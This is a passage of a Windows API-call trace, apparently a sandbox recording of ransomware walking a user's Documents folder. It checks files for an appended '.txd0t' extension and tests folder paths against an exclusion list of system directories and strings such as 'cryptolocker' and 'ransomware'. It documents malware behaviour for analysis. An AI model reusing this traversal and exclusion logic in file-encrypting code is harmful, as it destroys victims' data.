| out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.443] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="aayLh9Av.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx.txd0t" [0119.443] PathFindExtensionW (pszPath="aayLh9Av.xlsx.txd0t") returned=".txd0t" [0119.443] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.443] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c4d210, ftCreationTime.dwHighDateTime=0x1d5e83c, ftLastAccessTime.dwLowDateTime=0xe5260e00, ftLastAccessTime.dwHighDateTime=0x1d5ef56, ftLastWriteTime.dwLowDateTime=0x513cafee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1865f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="chS1ef v8z.odp.txd0t", cAlternateFileName="CHS1EF~1.TXD")) returned 1 [0119.443] StrCmpW (psz1="chS1ef v8z.odp.txd0t", psz2=".") returned 1 [0119.443] StrCmpW (psz1="chS1ef v8z.odp.txd0t", psz2="..") returned 1 [0119.444] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.444] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.444] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="chS1ef v8z.odp.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp.txd0t" [0119.444] PathFindExtensionW (pszPath="chS1ef v8z.odp.txd0t") returned=".txd0t" [0119.444] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.444] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x186cbfe0, ftCreationTime.dwHighDateTime=0x1d5cf93, ftLastAccessTime.dwLowDateTime=0x85968cb0, ftLastAccessTime.dwHighDateTime=0x1d5f025, ftLastWriteTime.dwLowDateTime=0x513f144c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x180c9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="CsjFe8d.pptx.txd0t", cAlternateFileName="CSJFE8~1.TXD")) returned 1 [0119.444] StrCmpW (psz1="CsjFe8d.pptx.txd0t", psz2=".") returned 1 [0119.444] StrCmpW (psz1="CsjFe8d.pptx.txd0t", psz2="..") returned 1 [0119.444] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.444] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.444] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="CsjFe8d.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx.txd0t" [0119.444] PathFindExtensionW (pszPath="CsjFe8d.pptx.txd0t") returned=".txd0t" [0119.444] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.444] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x5ad15bdf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x55200, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Database1.accdb.txd0t", cAlternateFileName="DATABA~1.TXD")) returned 1 [0119.444] StrCmpW (psz1="Database1.accdb.txd0t", psz2=".") returned 1 [0119.444] StrCmpW (psz1="Database1.accdb.txd0t", psz2="..") returned 1 [0119.444] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.444] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.444] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Database1.accdb.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Database1.accdb.txd0t" [0119.444] PathFindExtensionW (pszPath="Database1.accdb.txd0t") returned=".txd0t" [0119.444] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.444] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.444] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.444] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.444] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbebfca0, ftCreationTime.dwHighDateTime=0x1d5eb4c, ftLastAccessTime.dwLowDateTime=0x694d61f0, ftLastAccessTime.dwHighDateTime=0x1d5ef0d, ftLastWriteTime.dwLowDateTime=0x5141784d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x225b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="dMMktGSdsuA8JTH.docx.txd0t", cAlternateFileName="DMMKTG~1.TXD")) returned 1 [0119.444] StrCmpW (psz1="dMMktGSdsuA8JTH.docx.txd0t", psz2=".") returned 1 [0119.444] StrCmpW (psz1="dMMktGSdsuA8JTH.docx.txd0t", psz2="..") returned 1 [0119.444] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.444] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.444] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="dMMktGSdsuA8JTH.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx.txd0t" [0119.444] PathFindExtensionW (pszPath="dMMktGSdsuA8JTH.docx.txd0t") returned=".txd0t" [0119.444] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.444] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe473dc0, ftCreationTime.dwHighDateTime=0x1d56dd1, ftLastAccessTime.dwLowDateTime=0xc7450bc0, ftLastAccessTime.dwHighDateTime=0x1d59b69, ftLastWriteTime.dwLowDateTime=0x5141784d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x130b9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="gaAE08.xlsx.txd0t", cAlternateFileName="GAAE08~1.TXD")) returned 1 [0119.444] StrCmpW (psz1="gaAE08.xlsx.txd0t", psz2=".") returned 1 [0119.445] StrCmpW (psz1="gaAE08.xlsx.txd0t", psz2="..") returned 1 [0119.445] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.445] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.445] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="gaAE08.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx.txd0t" [0119.445] PathFindExtensionW (pszPath="gaAE08.xlsx.txd0t") returned=".txd0t" [0119.445] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.445] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1b030, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0x5fc14230, ftLastAccessTime.dwHighDateTime=0x1d57ebc, ftLastWriteTime.dwLowDateTime=0x51464c25, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xb98c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="lLleeaH.xlsx.txd0t", cAlternateFileName="LLLEEA~1.TXD")) returned 1 [0119.445] StrCmpW (psz1="lLleeaH.xlsx.txd0t", psz2=".") returned 1 [0119.445] StrCmpW (psz1="lLleeaH.xlsx.txd0t", psz2="..") returned 1 [0119.445] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.445] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.445] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="lLleeaH.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx.txd0t" [0119.445] PathFindExtensionW (pszPath="lLleeaH.xlsx.txd0t") returned=".txd0t" [0119.445] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.445] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8c878c0, ftCreationTime.dwHighDateTime=0x1d58b7c, ftLastAccessTime.dwLowDateTime=0x53d3ce0, ftLastAccessTime.dwHighDateTime=0x1d58e68, ftLastWriteTime.dwLowDateTime=0x51465f56, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18f22, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="lzf-_9_.pptx.txd0t", cAlternateFileName="LZF-_9~1.TXD")) returned 1 [0119.445] StrCmpW (psz1="lzf-_9_.pptx.txd0t", psz2=".") returned 1 [0119.445] StrCmpW (psz1="lzf-_9_.pptx.txd0t", psz2="..") returned 1 [0119.445] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.445] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.445] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="lzf-_9_.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx.txd0t" [0119.445] PathFindExtensionW (pszPath="lzf-_9_.pptx.txd0t") returned=".txd0t" [0119.445] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.445] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x487438f0, ftCreationTime.dwHighDateTime=0x1d5e12a, ftLastAccessTime.dwLowDateTime=0x3a657ae0, ftLastAccessTime.dwHighDateTime=0x1d5e593, ftLastWriteTime.dwLowDateTime=0x51470edd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x708e, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Md5Q.odt.txd0t", cAlternateFileName="MD5QOD~1.TXD")) returned 1 [0119.445] StrCmpW (psz1="Md5Q.odt.txd0t", psz2=".") returned 1 [0119.445] StrCmpW (psz1="Md5Q.odt.txd0t", psz2="..") returned 1 [0119.445] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.445] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.445] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Md5Q.odt.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Md5Q.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Md5Q.odt.txd0t" [0119.445] PathFindExtensionW (pszPath="Md5Q.odt.txd0t") returned=".txd0t" [0119.445] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.445] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e36670, ftCreationTime.dwHighDateTime=0x1d5cdf0, ftLastAccessTime.dwLowDateTime=0xda2c03d0, ftLastAccessTime.dwHighDateTime=0x1d59bf8, ftLastWriteTime.dwLowDateTime=0x51611625, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16bb6, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="mDGOSIz_qds.docx.txd0t", cAlternateFileName="MDGOSI~1.TXD")) returned 1 [0119.445] StrCmpW (psz1="mDGOSIz_qds.docx.txd0t", psz2=".") returned 1 [0119.445] StrCmpW (psz1="mDGOSIz_qds.docx.txd0t", psz2="..") returned 1 [0119.445] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.445] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.446] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="mDGOSIz_qds.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx.txd0t" [0119.446] PathFindExtensionW (pszPath="mDGOSIz_qds.docx.txd0t") returned=".txd0t" [0119.446] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.446] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1200a910, ftCreationTime.dwHighDateTime=0x1d587f8, ftLastAccessTime.dwLowDateTime=0xc9923070, ftLastAccessTime.dwHighDateTime=0x1d5e762, ftLastWriteTime.dwLowDateTime=0x5163795f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x63d9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="MRcnfzewVmw.docx.txd0t", cAlternateFileName="MRCNFZ~1.TXD")) returned 1 [0119.446] StrCmpW (psz1="MRcnfzewVmw.docx.txd0t", psz2=".") returned 1 [0119.446] StrCmpW (psz1="MRcnfzewVmw.docx.txd0t", psz2="..") returned 1 [0119.446] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.446] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.446] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="MRcnfzewVmw.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\MRcnfzewVmw.docx.txd0t" [0119.446] PathFindExtensionW (pszPath="MRcnfzewVmw.docx.txd0t") returned=".txd0t" [0119.446] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.446] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0119.446] StrCmpW (psz1="My Music", psz2=".") returned 1 [0119.446] StrCmpW (psz1="My Music", psz2="..") returned 1 [0119.446] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0119.446] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0119.446] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0119.446] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0119.446] StrCmpW (psz1="My Shapes", psz2=".") returned 1 [0119.446] StrCmpW (psz1="My Shapes", psz2="..") returned 1 [0119.446] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0119.446] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0119.446] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0119.446] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde4069f0, ftCreationTime.dwHighDateTime=0x1d5f0c3, ftLastAccessTime.dwLowDateTime=0x5d35a670, ftLastAccessTime.dwHighDateTime=0x1d5e1f2, ftLastWriteTime.dwLowDateTime=0x5163795f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x256f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NUZN31jJgT6UykF_.ots.txd0t", cAlternateFileName="NUZN31~1.TXD")) returned 1 [0119.446] StrCmpW (psz1="NUZN31jJgT6UykF_.ots.txd0t", psz2=".") returned 1 [0119.446] StrCmpW (psz1="NUZN31jJgT6UykF_.ots.txd0t", psz2="..") returned 1 [0119.446] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.446] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.446] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="NUZN31jJgT6UykF_.ots.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots.txd0t" [0119.446] PathFindExtensionW (pszPath="NUZN31jJgT6UykF_.ots.txd0t") returned=".txd0t" [0119.446] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.446] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x517427ed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0119.447] StrCmpW (psz1="Outlook Files", psz2=".") returned 1 [0119.447] StrCmpW (psz1="Outlook Files", psz2="..") returned 1 [0119.447] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.447] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.447] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Outlook Files", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\system32\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\system\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\local\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\boot\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\perflogs\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\programdata\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\drivers\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\wsus\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="crypt_detect") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="cryptolocker") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="ransomware") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\WINDOWS") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\Program Files") returned 0x0 [0119.447] GetProcessHeap () returned 0xe30000 [0119.447] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xed39f8 [0119.447] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0119.447] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*" [0119.447] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x517427ed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0119.448] 